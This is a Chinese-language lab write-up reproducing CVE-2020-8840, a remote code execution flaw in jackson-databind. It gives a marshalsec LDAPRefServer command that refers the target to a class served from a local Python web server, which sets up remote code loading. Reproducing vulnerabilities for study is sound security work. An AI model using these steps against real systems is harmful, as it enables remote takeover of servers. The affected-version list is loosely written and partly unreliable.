FasterXML/jackson-databind 远程代码执行漏洞复现(CVE-2020-8840)

简介

FasterXMLjackson-databind是一个简单基于Java应用库,Jackson可以轻松的将Java对象转换成json对象和xml文档,同样也可以将json、xml转换成Java对象。

影响范围

产品

FastXML

版本

FasterXMLjackson-databind<2.9.9.2

FasterXMLjackson-databind<2.10.0

FasterXMLjackson-databind<2.7.9.6

FasterXMLjackson-databind<2.8.11.4

组件

FasterXMLjackson-databind

FasterXMLback-ported

复现

环境搭建

https://github.com/fairyming/CVE-2020-8840

项目下下来,所需的环境和POC都在里面。

在IDEA里创建项目

image-20210416201116043

接下来还需要一个东西是marshalsec,这个在GITHUB上可以找到

将这三个文件放在同一个文件夹里

image-20210416201247948

在Exploit.java里修改所需要执行的命令

image-20210416201423702

接下来使用marshalsec来创建LDAP

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:80/#Exploit

然后使用Python创建Web服务

python2 -m SimpleHTTPServer 80

环境基本就配置好了

最后在IDEA里运行,Poc.java文件完成复现

image-20210416201700147

Q.E.D.